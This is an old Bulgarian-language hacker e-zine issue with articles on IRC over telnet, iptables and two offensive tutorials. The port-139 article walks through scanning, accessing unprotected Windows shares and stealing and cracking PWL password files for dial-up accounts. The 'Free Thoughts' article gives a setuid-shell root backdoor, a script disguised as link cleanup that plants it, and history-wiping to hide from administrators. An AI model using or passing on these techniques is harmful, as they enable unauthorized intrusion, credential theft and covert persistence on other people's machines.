&&&& #### @@ && & $$$ # # %%% **** !!!! @ @@ &&&& $ $ ### % % * ** !! !! @ @@ && $$ ___ # # %%% *** !!!!! @@@ && $$ # %%% * ** !! !! @@@ &&&& $ $ ### % % **** !!! !! @ @@ && $$$ %%% %%% @ @@@ A/m$ ,A/btc - Magazine <<===============>> Issue 3 |Month :October | |Year :2002 | <<===============>> 1. InTr0 (hipodilski) 2. Telnet Chat Tutorial (static) 3. SmbHacking (hipodilski) 4. Free Thoughts(hipodilski) 5. iptables, or a pretty secure system 6. Your Suggestions! 1.>InTr0 **************************************************************************** Da budesh ili ne tova e vuprosxt e kazal shekspir predi okolo 4 veka (ako ne gresha) :]. Sustiat tozi vapros mozhe da bude zadaden i v segashno vreme no vuprosxt mu bi bil vse oste taka protivorechiv i iavno kupishtata vreme ne sa zalichili znachenieto na vaprosa. Sustiat tozi vapros e strashtno aktualen za Software-a s otvoren kod i bezplatnite software-ni produkti ,no kato cheli vse poveche hora se orientirat kxm ideotski napravenite produkti na microsoft i v po malka ili po goliama stepen tezi na Mac zabraviaiki che svobodata e purvoto i nai vazhno nesto bez koeto chovek ne bi prosxstestvuval prez hiliadoletiata chrez komersialnite si produkti(s zatvoren kod) i visokite si ceni te samo izgrazhdat vse poveche barieri mezhdu horata i opropastiavat osnovnite idei s koito horata sa izmislili machinite i po specialno komputrite [ obrazuvatelna , razvlekatelna , nauchna ] i t.n. rabota koiato obache ne mozhe da bude cialostno postignata s komersialni produkti i komersialna misxl .. Minaloto pokazva che genialnite idei sa bili stranni neobichaini i othvurliani s godini ot obstestvoto no v kraina smetka sa pokazali na vsichki svoiata genialnost. Smiatam che sustoto se otnasia i za (open source) produktite.I prizovavam vseki koito chete tova da se prisxedini kxm open source community da vkusi ot genialnostta na unix baziranite operacionni systemi i sxs vsiakakvi vuzmozhni sredstva da razviva poslednite.. Dano ima hora koito da sa suglasni s moeto i predpolagam na vsichki hora koito podpomagat pC-fREAK da prosustestvuva.. Vseki koito priema i spodelia idei kato goreposochenite e svoboden da stane pc-freak member chrez prosto prastane na mail na : roots@pcfreak.cc.Blagodaria vi che prochetohte gluposti- te na edin bolen mozak :]]. And May Unix Be With You:]]]]. 2.> How To Chat With Telnet -- Don't Push It!:]] ( static-X ) ************************************************************ # Kakto vsichki znaeme telnet protocol-a po princip se izpolzva za vruzka # m/u nai-razlichni pc-ta iz neta, kato dava vuzmojnost za connection do # vsqkakvi portove, ako tova e vuzmojno rzbirase. # Ta tochno tova i mi dade povod da opitam vuzmojen li e connection na # telnet do ircd, razbirase vsichki programisti koito pishat TCL-i za irc # botove izpozvat telnet komandi ili po tochno directni ircd comandi. # I reshih da opitam directen connection do irc-server s pomoshta na # telnet, kato za celta izpolzvam otvoren port 6667 naprimer... telnet irc.static.net 6667 # sled izolzvane na tazi komanda se poqvqvat slednite saobshteniq ... Trying 127.0.0.3... Connected to irc.static.net. Escape character is '^]'. NOTICE AUTH :*** Looking up your hostname... NOTICE AUTH :*** Checking Ident NOTICE AUTH :*** No Ident response NOTICE AUTH :*** Couldn't look up your hostname # razbirase samo do tuk, poradi prichinata che telnet protocol-a ne dava # absolutno nikaki danni za user-a koito se connectva i ircd-to nemoje da # go prieme... za celta trqbva da dam ostanalite nujni parametri kato # izpolzvam komandite ... user identd index1 index2 Realname nick static # razbirase tova e absolutno dostatachno ... i veche sum v irc-mrejata :irc.static.net 001 static :Welcome to the Internet Relay Network static :irc.static.net 251 static :There are 1 users and 0 invisible on 1 servers :irc.static.net 255 static :I have 1 clients and 0 servers :irc.static.net 265 static :Current local users: 1 Max: 1 :irc.static.net 266 static :Current global users: 1 Max: 1 :irc.static.net 267 static :Current identified users: 0 Max: 0 :irc.static.net 250 static :Highest connection count: 1 (1 clients) (2 since server was (re)started) :irc.static.net 375 static :- irc.static.net Message of the Day - # Razbirase trqbva da vi predstavq i po-vajnite komandi, kakto vsichki # znaeme te sa ne po razlichni ot tezi v eggdop tcl-ite, kato naprimer za # private msg do user ili chan izpolzvate komandata... # do user v irc privmsg nick : message # do channel v irc privmsg #operwall : message # Sushto taka mnogo vajno e da znaete che telnet protocola ne vrushta # avtomatichno kato irc clientite ping-a do servera, taka che pri # vseki poluchen ping na irc servera vie trqbva da mu otgovarqte s # komandata... PONG :irc.static.net # ako tova ne go pravite shte budete razkacheni ot server-a s reason # (Ping timeout: 180 seconds), poradi prichinata che ircserver-a, smqta # che e zagubil vruzka s vas !!! PING :irc.static.net ERROR :Closing Link: static[~ork@255.255.255.255] (Ping timeout: 180 seconds) # Manual about telnet IRC chatting. # by static (Milen Nedelchev) # from PC FREAK ORG™ (grad Dobrich) # for more info or help send mail to: # static@notme.com or root@pcfreak.cc # # © 2002 Dobrich (BG) 3.> How To Hack Windows Machines Through Port 139 opened. ( hipodilski ) ********************************************************* How To Hack Windoze(boze) Machines with open port 139 +-==================================================+- Znachi hackinga na windoze machina se izvurshva po slednia nachin nmap x.x.x.x -p 139 x=1-255 x.x.x.x=ip address.nmap e port scanner za machini (v sluchai che ne znaete de) -p e za skanirane na opredelen port scanirate port 139 zastoto tova e netbios ili oste SAMBA protokola vxveden ot Microsoft tozi vid hacking raboti pri machini s operacionni sistemi win 3.11 , win 95 , win 98 (2000 mozhe bi ne sxm siguren). sled kato skanirate opredelenoto ip ip-ta gledate chii port 139 na vuprosnata zhertva sa otvoreni.Namiraiki takiva izpolzvate nmblookup nmblookup -A machina kxdeto -A vi e status-a za workgroupite i lognatite useri na machinata tova info vi triabva za listinga na sharingite chrez smbclient. Scaniraneto chrez nmap triabva da vi dade rezultat ot roda na Interesting ports on sofia73-24.pip.digsys.bg (193.68.24.73): Port State Service 139/tcp open netbios-ssn Interesting ports on sofia74-24.pip.digsys.bg (193.68.24.74): Port State Service 139/tcp filtered netbios-ssn tuk rabota ni vurshi otvoreniat 139-ti port na 193.68.24.73 nmblookup -A 193.68.24.70 triabva da vi dade rezultat ot sorta na [root@pcfreak /root]# nmblookup -A 193.68.24.73 Looking up status of 193.68.24.73 received 5 names OK <00> - B WORKGROUP <00> - B OK <03> - B OK <20> - B WORKGROUP <1e> - B znachi user-a na machinata koito e sharenal nesto na machinata e OK -- oznachava che user-a e lognat v momenta sega polzvaiki smbclient -L ste vidim full listing na sharingite pozvoleni ot tozi user [root@pcfreak /root]# smbclient -L OK -I 193.68.24.73 added interface ip=212.72.208.144 bcast=212.72.208.255 nmask=255.255.255.128 Password: Sharename Type Comment --------- ---- ------- E Disk D Disk C Disk IPC$ IPC Remote Inter Process Communication password-a v sluchaia vi e enter ponezhe glupavia windows potrebitel ne e slozhil parola na user-a si:].I eto Sharenatite ustroistva ot zhertvata sa E , D , C i IPC$ - ne vi e nuzhno.. za da se connectnete kxm zhertvata polzvate poluchenata informacia ot zhertvata za user-a lognat i sxotvetnia sharing koito user-a e razreshil smbclient //OK/D -I 193.68.24.73 i s malko povechko kysmet i zle configurirana windoze mrezha ste vutre smb:\> ako uspeete da vlezete v hdd-to na victim-a znachi veche imate vuzmozhnost da si go mounete localno na v /mnt/ideot primerno mount -t smbfs -o guest,ip=193.68.24.73 //OK/D /mnt/ideot i mozhete da si polzvate linux naborite ot programi mc ,rm -rf *:-=]] etc.. .... ako vi dade sxobstenie session request to USER failed (Not listening for calling name) session request to *SMBSERVER failed (Not listening for calling name) znachi ne mozhete da hacknete po tozi nachin vxprosnata machina. v zavisimost ot ukazania sharing mozhete da samo da chetete ot Disk-a na zhertvata ako e ustroistvoto e sharenato Read Only ili da chete i pishete ednovremenno ako imate Full Sharing(liubimia MI sluchai).:]]]. Ostaviam vi da opitvate nahvurlanata idea kato utochniavam che ideiata ne e izcialo moia a e vzaimstvena ot men a ot Maridish koito beshe napisal article na tazi tema mozhete da vidite article-a na http://www.hackinthebox.org/article.php?sid=5719. Osven tova ako victimat ima Sharenat-to ustroistvo C mozhete s udovolstvie da mu vlezete v windows dir-a cd windows i da getnete *.PWL fileovete toest fileovete mu s paroli(predpolagam vsichki se sestate za tove de:]) mozhete da napravite tova taka smb:/>promt off ... smb:/>cd windows smb:/>mget *.pwl sled kato veche imate vxprosnite pwl-i mozhete da si pusnete bozata da si svalite niakoi dobxr pwltool za decodirane na parolite te sa dosta taka che niama da imate problem s namiraneto na takxv mozhete da potursite v google.com Search for:pwltool decoder i ste si namerite.... decodiraiki parolite v nai dobriat sluchai vie veche pritezhavate dial-up account-a na zhertvata.i ako imate takxv provider okolo vas mozhete da ne davate pari za net:] i da si polzvate na volia.By the hell ima i drug nachin za decodirane na parolite chrez polzvaneto na dripper(Dial Up Ripper) tova e edna malka programka za winboze koiata prosto prochita pass-ovete ot pwl-a ia razkodira da utochnia prochita pass-a ot pwl-a na computera na koito ste ia pusnali.Taka che spokoino mozhete da podmenite vashiat *.PWL s toia na zhertvata koito ste "vzeli sxs negovo sxglasie":]] i da otvorite system.ini i da promenite reda koito ukazva password-a da se chete ot vashiat pwl v moia sluchai [Password Lists] DEMON=C:\WINDOWS\DEMON.PWL DEMON.PWL s imeto na PWL-a na zhertvata i sled reboot(restartirai i vsichko ste se opravi:]]])mozhete chrez Dripper da si ripnete passwordite na victim-a. Samo ste dobavia che microsoft sa edni bezdelnici ponezhe algorithamxt na kodirane na *.PWL-a se naricha RC4 i e edin mnogo prost algorith za codiracia.... Tova e zasega na tema port 139 Hacking Enjoy The Phucking Hacking Stuff:]]. 4.>Free Thoughts ( hipodilski ) ***************************************************************** -==-=-=-=-==- Zadavali li ste si vaprosa kak da polzvate root-ski prava bez upotreba na su i sudo? zastoto az si go zadadoh i dulgo se chudih kak mozhe da stane ,predi da procheta statia napisana na tema hacking na unix ,no nali linux e moderated free unix os to logichno beshe metodikata posochena v manual-a na Sir Hackalot da e podobna .. Ideiata se sustoi v tova kakto vsichki znaem vseki file si ima prava sustoto se otnasia i za file-to /bin/sh tova e shell interpetator-a koito pritezhava ssvoio User Id(UID) to e mnogo visoko zastoto sh pritezhava fundamentalni fileove i programi davashti na choveka izpulnil tazi programa root access. Mozhete da polzvate i csh zsh ksh ili tam nalichniat vi shell predpolagam che efekta ste e analogichen.I taka kak da se podsigurim s rootski prava za cherni dni?. Imaiki root kopirame /bin/sh v ~/sh ili v direktoria koiato e po zabutana cp -f /bin/sh ~/sh. sled tova postaviame sticky bit na shell-a chrez chmod a+s $HOME/sh -- Thats it!.sega chrez postavianeto na sticky bit na /bin/sh shell-a shell-a stava user ID toest user-at koito izpalniava /bin/sh na koito setnahme sticky bit ste pridobie root previlegues estestveno mozhe vmesto chmod a+s ~/.xauthori../.bashenv da napravite purvo chown -h username:username file za da smenite pritezhatelia na file-a na user-a vi s normalni prava koito ste polzvate za dobivaneto na root-skiat access po kusno dori i sled smenena root-ska parola na machinata i etc. sled tova mozhete da polzvate chmod o+s ~/.xaut../.bashenv za da dadete sticky bit samo na owner-a toest na sustia toia owner na koito predi malko s chown -h .. smenihte pritezhatelia na preimenuvania i zamaskirania /bin/sh. sega sega veche userat s normalni prava ste izglezhda napulno chist a v sustoto vreme ste pritezhava rootski access na machinata posredstvom cd ~/.xauth../ ; ./.bashenv sled puskaneto na koeto ste vidite bash-x.xx:/# ;;=]] .tova e dosta po udobno ot su i sudo osven tova za upotrebata na su i sudo se logovat koito admin-a se predpolaga redovno prochita dokato pusnatia chrez tozi nachin na dobivane na root access root-at po nikakxv nachin ne mozhe da razbere che ima vulnerability v machinata .. e razbira se osven ako ne e pulen paranoik:]]. sled puskaneto na preimenuvania i premesten /bin/sh s vashia user e dobre da si izchistite history-to chrez history -c zastoto v protiven sluchai history-to vi ste bude nai veroiatno procheteno ot root-a !! Vnimanie !! Nikoga ne ostavaite sledi kazvam tova zastoto az lichno redovno zabraviam da pochistia svoite /.'] e vse pak nali sxm kaun.. ta taka dobre e da promeniame imeto na sh-to zastoto za vseki edin sredno razbirasht admin bi bilo stranno da ima sh v home dir-a na user.Ne e zle da krustite file-a .bashenv naprimerv direktoria $HOME/.xauthorizatian/.bashenv sled tova addnete user s normalni prava chrez adduser username passwd username smeniate mu pass-a mozhete da polzvate i drug user s normalni prava na koito znaete pass-a ofcurse:].Sega Imate chisto i prosto root access do machinata posredstvom vashiat $HOME/.xauthorization/.bashenv naprimer log-vate se s user-a v koito v home dir-a ste izcopirali /bash/sh v ~/.xauthorization/.bashenv ili tam kakto ste go krustili sledva da go pusnete i dobivate vednagichesky bash-xxx:/# ..:]. tova imate pulen kontrol na machinata bez da addvate user-i s superuser prava.:] i da polzvate dosadnoto sudo oste poveche che na machinata mozhe da lipsva sudo. mozhete da vidite eto i kakvo stava sled kato pusnete vuprostnoto sh :] eto i malka demonstracia: root@pcfreak:/home/hipo# cd /bin/ root@pcfreak:/bin# cp sh /home/hipo/ ; chown -h hipo:hipo sh ; chmod o+s sh root@pcfreak:/bin# su hipo hipo@:/bin$cd ~ hipo@:~$./sh sh-2.05a# id uid=1000(hipo) gid=1000(hipo) euid=0(root) egid=0(root) groups=1000(hipo) sh-2.05a# chrez uzpulnenie na komanda id sami mozhete da zabelezhite che osven standartnoto user id(uid) i group id(gid) imate i extra uid=0 i extra gid=0 koeto ste reche che imate rootski prava:]. posredstvom pravata na sh v sistemata ili shell id-to. Eto sega i edin elementaren shell script s koito mozhete da metnete maloumnia si admin ako niama nikxff akull v glavata : ; ------------------------------------------------------------------- #!/bin/bash #change here username with the username of your user where sh file will be #copied username='hipo' mkdir /home/$username/.tmp/.tempenv echo 'Cleaning Dead Links on the machine' echo for dots in 1 2 3 4 5 6 7 8 9; do sleep 0 echo "." done cp -f /bin/sh /home/$username/.tmp/.tempenv cd /home/$username/.tmp/ chown -h $username:$username /home/$username/.tmp/.tempenv chmod o+s /home/$username/.tmp/.tempenv echo 'Cleaning Deadlinks Accomplished!' ------------------------------------------------------------------- Mozhe bi pri extra tupi admini toia nomer bi minal have fun sxs script-a :]. Ako vednuzh veche ste dobili rootski prava chrez tozi script mozhete da se pomaitapite na volia s lognatite user-i chrez commandata banner naprimer: banner -w 50 Looser > /dev/tty1.ste pokazhe na lognatia user na tty1 v lek ascii art s dosta golemi bukvi Looser :]. Iskam da otpravia special 10xz do Sir Hackalot koito si e napravil truda da napishe shodna informacia kxdeto e razvil chast ot tazi tema koiato az se opitah da dorazvia.Preporachvam vi da Prochetete negoviat Tutorial How To Hack koito ste uploadna na www.pcfreak.cc po nastoiastem v Sekciata Magazine kxdeto po nastoiastem ste se namira i tazi statiia zaedno s pc-freak broi 3.:]. Tova e vsicko po tazi tema .. ako niakoi znae poveche po vuprosa i iska da spodeli sxotvetno da stane chlen na pc-freak da prashta mail na root@pcfreak.cc || roots_bg@yahoo.com nedovolstveni psuvni i nezadovoleni meraci mozhete da gi miatate sxsto na gore posochenite mailz-ove :]. So Have Fun && kill someone kill something kill yourself ((Sex Pistols)) ****************************************************************************** 5.> iptables tutorial, or a pretty secure system! ****************************************************************************** Hello, I'd like to introduce MYSELF! Az sam PsioN (real name: Vladislav Sergeev), mestojiweene: Svoge/Montana, rabota: (minutki za reklama) sysadmin I sega shte obiasnia (nabarzo) 2te nai-wajni neshta za iptables - ip filtrirane i routing. Razlikata m/u iptables & ipchains e wazmojnostta iptables da izpolzwa moduli za razshiriawane na wazmojnostite mu. Iptables e default fitera za RedHat 7.2 i nagore i za mnogo drugi novi linux distribucii. Prepora4itelno e da ste se zanimawali we4e s ipchains, koito e po-lesen, no po-beden na wazmojnosti. Urok 1 - Filtrirane na naprimer sunrpc (111) port Command: iptables -A INPUT -p tcp --dport 111 -j DROP Obiasnenie: parametarat '-A INPUT' ukazwa na iptables da dobawia kam werigata INPUT (w kraia na kraishtata filtrirame wanshni zaiawki kam nashia komp.), '-p tcp' ukazwa 4e stawa wapros za tcp protocola i awtomati4no zarejda modula za tcp (ina4e - '-m tcp'). Tozi modul dobawia upotrebata na now switch - '--dport' (sakrateno ot destination port). --dport 111 ozna4awa 4e stawa wapros za zaiawka DO port 111 (sunrpc). Mojete da izpolzwate i dwata warianta na izpiswane - --dport 111 ili --dport sunrpc. '-j DROP' ukazwa paketa da se ignorira. Urok 2 - Filtrirane na FTP, no bez da waji za lokalnata mreja Command: iptables -A INPUT -p tcp --dport 21 -s !192.168.1.0/24 -j DROP Obiasnenie: Pro4eti po-gore. Now switch - '-s !192.168.1.0/24'. -s idwa ot "source", "!" obrashta prawiloto na obratno (ako source NE e 192.168.1.0/24, paketa se ignorira). 192.168.1.0 w primera sa lokalnite ip adresi, /24 ukazwa mrejowa maska ot 24 bita (obshto ip adresa ima 32 bita, ot tiah se maskirat 24, sledowatelno ostawat 8 bita - moje da se promenia samo poslednia oktet - 192.168.1.0 do 192.168.1.255) Urok 3 - MASQUERADE-ing sas iptables (simple nat) Command: iptables -t nat -A POSTROUTING -o ppp0 -s 192.168.1.0/24 -j MASQUERADE Obiasnenie: Imate lokalna mreja, w neia e wkliu4en komp. s linux i wrazka do internet prez modem (ppp0) ili mrejowa karta (bi bilo eth1). W slu4aia s mrejowata karta shte e eth1 ako parwata mrejowa karta (eth0) e kam washata mreja, a wtorata (eth1) e kam internet. '-t nat' ukazwa da se izpolzwa tablica za NAT (Network Address Translation), '-A POSTROUTING' dobawia prawiloto kam werigata za routing sled whoda (e, ima i routing PREDI whoda, izpolzwa se za transparent proxy, naprimer), '-o ppp0' ukazwa output interfeisa (prez koito izliza trafika KAM internet), a '-s 192.168.1.0' - da se rutira lokalnata mreja. '-j MASQUERADE' e nai- prostiat wazmojen NAT - prosto ip adresa na izto4nika se zamenia s ip adresa na rutera (e, estestweno rutera si pazi tablica na wrazkite, za da znae kade da izprati otgowora). E, nadiawam se da wi pomognah s osnownite neshta za iptables, i ako se interesuwate shte otkriete kakwi neweroiatni wazmojnosti imat modulite ('-m mac' e za filtrirane po hardware address na mrejowata karta. Interesno, ili? -A PREROUTING moje pak da se izpolzwa za da preminawat wsi4ki klienti prez proxy server, bez dori da znaiat za nego). ****************************************************************************** ==================| | M E M B E R list | |=|=|=|=|=|=|=|=|=| |1.hipodilski | |2.Indjeto | |3.static(x) | |4.Strasharo | |5.PsioN | |6.necroleak | |7.hellpain | |8.bomzh | mail For Contacts: root@pcfreak.cc /=\=/=\=/=\=/=\ =-http//:www.pcfreak.cc-= So This iS the end ! For this Issue .. About the next issue?? it depends fully on you.! ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Thanks For Loosing Your time reading This Stuff Hope Really Enjoy It .. |:| pC - fREAK Organization